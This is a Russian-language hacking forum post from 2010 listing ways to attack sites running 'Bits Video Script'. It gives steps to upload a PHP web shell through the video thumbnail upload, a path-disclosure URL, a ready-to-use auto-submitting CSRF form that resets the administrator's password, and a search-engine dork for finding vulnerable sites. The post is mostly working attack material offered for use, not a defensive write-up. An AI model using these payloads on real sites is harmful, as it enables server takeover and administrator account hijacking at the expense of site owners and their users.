Уязвимости Bits Video Script

Discussion in 'Веб-уязвимости' started by seofilms, 29 Apr 2010.

  1. seofilms

    seofilms Elder - Старейшина

    Joined:
    27 May 2009
    Messages:
    66
    Likes Received:
    46
    Reputations:
    14
    Заливка шелла без прав админа :

    Заходим на сайт, регистрируемся : сайт/register.php, входим со своим логином и паролем, заходим сюда : сайт/addvideo.php там где thumbs выбираем свой шелл и заливаем его.
    После заливки он находится здесь : cайт/thumbs/имявашегошелла.php

    [​IMG]

    Видео о том как залить шелл : http://www.youtube.com/watch?v=v6AOwLg1v3w



    Раскрытие путей :

    PHP:
    сайт/search.php?search[]=way&searchsubmit=
    csrf уязвимость

    PHP:
    <form method=post action="http://сайт/admin/password.php" onsubmit="return checkform(this);" name="csrf"
    <
    input type='text' name='password' value="НОВЫЙ ПАРОЛЬ КОТОРЫЙ ВЫ ПОСТАВИТЕ АДМИНИСТРАТОРУ">
    </
    form
    <
    script
    document.csrf.submit();
    </script> 
    Поисковой запрос

    PHP:
    inurl:search.php?order=views
    (C)forum.kidal.org
     
    #1 seofilms, 29 Apr 2010
    Last edited: 29 Apr 2010
    3 people like this.